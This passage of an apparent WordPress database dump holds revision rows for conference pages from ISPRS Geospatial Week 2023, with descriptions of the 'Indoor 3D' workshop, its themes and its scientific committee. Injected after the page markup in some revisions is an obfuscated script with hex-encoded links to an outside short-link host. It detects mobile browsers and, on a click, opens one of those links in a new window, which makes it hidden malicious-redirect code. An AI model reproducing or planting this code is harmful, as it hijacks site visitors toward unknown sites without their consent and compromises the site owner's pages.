)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IAMS - Intelligent and autonomous mapping systems','','inherit','closed','closed','','2580-revision-v1','','','2023-02-05 11:23:24','2023-02-05 11:23:24','',2580,'https://gsw2023.com/?p=3810',0,'revision','',0),
(3811,1,'2023-02-05 11:27:13','2023-02-05 11:27:13','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Indoor 3D</span></strong></h5>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5></h5>\n<h5 style=\"text-align: justify; color: black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIR</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">SECRETARY</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: purple;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\n</li>\n<li>\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\n</li>\n<li>\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>LBS in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative LBS systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\n</li>\n<li>\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\n</li>\n<li>\n<h6><strong>Smart facility maintenance</strong></h6>\n</li>\n<li>\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor location-linked big data</strong></h6>\n</li>\n<li>\n<h6><strong>SLAM methods in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\n</li>\n<li>\n<h6><strong>Human environment interactions in mobility context</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Mobility and assistive technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: purple;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\n</li>\n<li>\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\n</li>\n<li>\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\n</li>\n<li>\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\n</li>\n<li>\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\n</li>\n<li>\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University</strong></h6>\n</li>\n<li>\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\n</li>\n<li>\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\n</li>\n<li>\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\n</li>\n<li>\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\n</li>\n<li>\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\n</li>\n<li>\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><u>Selected papers:</u><u></u><u></u></h5>\n<h5>After the event, the authors of selected papers will be invited to submit the extended versions of their papers to the PFG – Journal of Photogrammetry, Remote Sensing and Geoinformation Science (<a style=\"color: blue;\" href=\"https://www.springer.com/journal/41064\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=https://www.springer.com/journal/41064&amp;source=gmail&amp;ust=1669914909168000&amp;usg=AOvVaw2hdBtPRabM3CR7bs4nXqo6\">https://www.springer.com/<wbr />journal/41064</a><a href=\"https://www.springer.com/journal/41064\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=https://www.springer.com/journal/41064&amp;source=gmail&amp;ust=1669914909168000&amp;usg=AOvVaw2hdBtPRabM3CR7bs4nXqo6\">)</a>; current impact factor: 3.292).</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2023-02-05 11:27:13','2023-02-05 11:27:13','',2586,'https://gsw2023.com/?p=3811',0,'revision','',0),
(3812,1,'2023-02-05 11:28:47','2023-02-05 11:28:47','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Indoor 3D</span></strong></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n&nbsp;\r\n<h5></h5>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]\r\n<h1 style=\"text-align: left;\">CHAIR</h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]\r\n<h1 style=\"text-align: left;\">SECRETARY</h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: purple;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>LBS in indoor environments</strong></h6>\r\n</li>\r\n 	